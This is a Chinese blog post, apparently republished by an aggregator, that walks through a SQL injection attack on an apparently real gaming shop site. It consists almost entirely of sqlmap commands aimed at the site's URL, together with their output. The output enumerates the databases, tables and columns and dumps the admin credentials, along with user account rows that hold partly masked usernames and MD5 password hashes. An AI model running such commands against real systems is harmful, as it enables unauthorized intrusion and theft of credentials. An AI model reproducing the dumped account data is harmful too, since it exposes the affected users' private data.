某网SQL注入漏洞实战
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了某网SQL注入漏洞实战相关的知识,希望对你有一定的参考价值。
[email protected]:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dbs
available databases [8]:
[*] dntg
[*] dntg2
[*] dnweb
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ultrax
[email protected]:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-db
#当前数据库
current database: ‘dnweb‘
[email protected]:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-user
#当前数据库用户
current user: ‘[email protected]‘
[email protected]:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --table -D "dnweb"
#列数据库表名
Database: dnweb
[25 tables]
+-----------------+
| account |
| admin_user |
| base |
| chajian |
| chongzhi |
| duihuan |
| libao_jilu |
| libao_list |
| meirilibao |
| meirilibao_jilu |
| mianfei |
| mianfei_list |
| money_name |
| role_dellist |
| roleid |
| server |
| shop_list |
| shop_list_copy |
| shop_tag |
| tuiguang |
| xiaofei |
| zhuce |
| zkfcn |
| zkfcq |
| zkfwp |
+-----------------+
[email protected]:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --columns -T "admin_user"
#列名
Database: dnweb
Table: admin_user
[2 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| admin_name | varchar(20) |
| admin_pass | varchar(32) |
+------------+-------------+
[email protected]:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dump -C "admin_name,admin_pass " -T "admin_user" -D "dnweb"
#列数据
Database: dnweb
Table: admin_user
[1 entry]
+------------+----------------------------------+
| admin_name | admin_pass |
+------------+----------------------------------+
| lok** | a9ee8d24806ee22c2daad334****** |
+------------+----------------------------------+
Database: dnweb
Table: account
[20 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| createtime | datetime |
| dlts | int(11) |
| email | varchar(255) |
| gold | int(10) |
| id | int(10) |
| jifen | int(10) |
| lastip | varchar(16) |
| logintime | datetime |
| lxdl | int(11) |
| money | int(10) |
| money2 | int(10) |
| name | varchar(32) |
| namemd5id | varchar(32) |
| password | varchar(32) |
| regip | varchar(16) |
| security | varchar(32) |
| tg | int(10) |
| tg2 | int(10) |
| tingyong | int(11) |
| vip | int(255) |
+------------+--------------+
+-------+------------+-------------+----------------------------------+----------+
| id | email | name | password | security |
+-------+------------+-------------+----------------------------------+----------+
| 11827 | 13350* | a414409798 | cee4fce6eaa87581421c296cbc0d3064 | NULL |
| 11828 | 000000 | lo*** | 670b14728ad9902aecba32e22fa4f6bd** | NULL |
| 11829 | 8888* | q139818572* | 4607e782c4d86fd5364d7e4508bb10d9 | NULL |
| 11830 | 123456 | 203412594* | cfd40caa535bb51378ab60849bb54486 | NULL |
| 11831 | 123456789 | na101* | e10adc3949ba59abbe56e057f20f883e | NULL |
| 11832 | NULL | hyt100* | 4c49c824492864666980b012bcf17d08 | NULL |
| 11833 | 32312* | hehe52121* | 0733f98f76375074a3424d5b6e8ffd68 | NULL |
| 11834 | 123456789* | fong201* | 2798ba5d7c1b4f6eec30c9a9cad51dca | NULL |
| 11835 | 123456 | q50504* | e10adc3949ba59abbe56e057f20f883e | NULL |
| 11836 | 1* | wf199* | 96e79218965eb72c92a549dd5a330112 | NULL |
+-------+------------+-------------+----------------------------------+----------+
以上是关于某网SQL注入漏洞实战的主要内容,如果未能解决你的问题,请参考以下文章